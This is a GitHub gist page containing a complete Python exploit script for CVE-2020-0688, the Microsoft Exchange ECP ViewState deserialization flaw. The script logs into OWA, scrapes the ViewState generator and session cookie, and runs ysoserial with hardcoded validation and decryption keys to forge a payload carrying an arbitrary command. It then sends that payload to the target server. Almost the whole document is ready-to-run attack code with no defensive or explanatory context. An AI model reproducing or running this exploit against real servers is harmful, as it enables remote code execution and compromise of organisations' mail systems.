Skip to content

Instantly share code, notes, and snippets.

@exploitio

exploitio/cve-2020-0688.py

Created March 30, 2020 18:50
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save exploitio/bd794ed3671ccf56c8370f82b4f2d68b to your computer and use it in GitHub Desktop.
Save exploitio/bd794ed3671ccf56c8370f82b4f2d68b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
cve-2020-0688.py
# encoding: UTF-8
import requests
import argparse
import re
import sys
import os
import urllib3
from urllib.parse import urlparse
from urllib.parse import quote
urllib3.disable_warnings()
ysoserial_path = os.path.abspath(os.path.dirname(__file__))+"/ysoserial/"
session = requests.Session()
def get_value(url, user, pwd):
print("[*] Tring to login owa...")
tmp = urlparse(url)
base_url = "{}://{}".format(tmp.scheme, tmp.netloc)
paramsPost = {
"password": ""+pwd+"",
"isUtf8": "1",
"passwordText": "",
"trusted": "4",
"destination": ""+url+"",
"flags": "4",
"forcedownlevel": "0",
"username": ""+user+""
}
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
"Connection": "close",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": "PrivateComputer=true; PBack=0"
}
cookies = {
"PBack": "0",
"PrivateComputer": "true"
}
login_url = base_url + '/owa/auth.owa'
print("[+] Login url: {}".format(login_url))
try:
login = session.post(login_url, data=paramsPost, headers=headers, verify=False, timeout=30)
print("[*] Status code: %i" % login.status_code)
if "reason=" in login.text or "reason=" in login.url and "owaLoading" in login.text:
print("[!] Login Incorrect, please try again with a different account..")
sys.exit(1)
except Exception as e:
print("[!] login error , error: {}".format(e))
sys.exit(1)
print("[+] Login successfully! ")
try:
print("[*] Tring to get __VIEWSTATEGENERATOR...")
target_url = "{}/ecp/default.aspx".format(base_url)
new_response = session.get(target_url, verify=False, timeout=15)
view = re.compile(
'id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(new_response.text))[0]
print("[+] Done! __VIEWSTATEGENERATOR:{}".format(view))
except:
view = "B97B4E27"
print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {}".format(view))
try:
print("[*] Tring to get ASP.NET_SessionId....")
key = session.cookies['ASP.NET_SessionId']
print("[+] Done! ASP.NET_SessionId: {}".format(key))
except Exception as e:
key = None
print("[!] Get ASP.NET_SessionId error, error: {} \n[*] Exit..".format(e))
return view, key, base_url
def ysoserial(cmd):
cmd = ysoserial_path+cmd
r = os.popen(cmd)
res = r.readlines()
return res[-1]
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--server", required=True, help="ECP Server URL: http://ip/owa")
parser.add_argument("-u", "--user", required=True, help="Domain Login: domain\\user")
parser.add_argument("-p", "--password", required=True, help="Domain Password")
parser.add_argument("-c", "--cmd", help="Command to EXEC", required=True)
parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true',default=False)
args = parser.parse_args()
url = args.server
print("[*] Start to exploit..")
user = args.user
pwd = args.password
command = args.cmd
view, key, base_url = get_value(url, user, pwd)
if key is None:
key = 'test'
sys.exit(1)
ex_payload = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{}" --viewstateuserkey="{}" --islegacy --isdebug""".format(command,view,key)
if args.encrypt:
ex_payload = ex_payload + ' --decryptionalg="3DES" --decryptionkey="E9D2490BD0075B51D1BA5288514514AF" --isencrypted'
print("\n"+ex_payload)
out_payload = ysoserial(ex_payload)
if args.encrypt:
final_exp = "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(base_url, quote(out_payload))
else:
final_exp = "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(base_url, view, quote(out_payload))
print("\n[+] Exp url: {}".format(final_exp))
print("\n[*] Auto trigger payload..")
status = session.get(final_exp,verify=False,timeout=15)
if status.status_code==500:
print("[*] Status code: %i, Maybe success!" % status.status_code)
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment